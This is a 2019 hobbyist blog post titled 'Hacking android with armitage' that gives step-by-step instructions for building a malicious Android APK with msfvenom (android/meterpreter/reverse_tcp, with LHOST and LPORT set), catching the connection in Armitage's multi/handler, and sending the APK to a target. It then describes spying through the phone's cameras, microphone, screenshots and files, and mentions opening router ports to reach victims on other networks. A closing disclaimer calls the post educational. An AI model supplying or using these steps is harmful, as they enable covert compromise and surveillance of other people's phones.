Saturday, October 5, 2019

Hacking android with armitage

Welcome to hacking a rise Im the Laughingman and this is how to hack a android phone with armitage i will be doing a local hack as im to lazy to find a target to show ye but i will make is as real as i can lol the method is the same only thing different is u need to open ur ports via router to hack someone on another network so let get started what we will be using is msfvemon and armitage this are all part metasploit witch comes installed on kali linux and parrot the two main os we use here at hacking a rise

What is Armitage

Armitage is nothing but a GUI tool for performing and managing all the tasks that otherwise could have been performed through msfconsole. Armitage helps visualize the targets, automatically recommends suitable exploits, and exposes the advanced post-exploitation
source :

What is Msfvenom

MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015. The advantages of msfvenom are: One single tool. Standardized command line options
source :

How to make the payload with msfvenom

right lads and gals first of all we open a terminal and type msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port > filename.apk
this will make the apk file with te payload into get the ip type ifconfig
Hacking A Rise ifconfigarmitage

as u see my local ip is 192.168.178.26 no we run msfvenom so im typing msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.26 LPORT=4444 >hackingarise.apk we hit enter now and let it build the payload
Hacking A Rise msfvenomarm

now open terminal and type service postgresql start
Hacking A Rise servicepostarmtives

now we can run armitage so go to the exploits in the main menu and click armitage or in terminal type armitage

Hacking A Rise runarmitageterminal

it will now ask to start metasploit u wanna hit yes and with for it to connect
Hacking A Rise startrpcservice

once it is connected it will load up armitage as u see in the pic the modules are in the left hand side and console on the bottom and the targets on the right of the panel but this not importing for now
Hacking A Rise armitagepannel

on the left hand were the modules are u see a empty text box in there type multi/handler
Hacking A Rise multihandleramr

now we click it and a little box will pop up asking us for the local host port and the payload we are using so we type in the lhost my ip but its allready set so we move to the local port witch is 4444 and the payload is android/meterpreter/reverse_tcp
Hacking A Rise multihander

now before we hit launch we send the payload to the target and hit launch once the target downloads and installs the payload it will pop up in the right and bottom of the panel
Hacking A Rise phonearmitage
boom we have a seesion
Hacking A Rise sessions1armitage

now we can make commands like screenshots and take pics with cams record from the mic view files what ever we want .

DISCLAMER

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.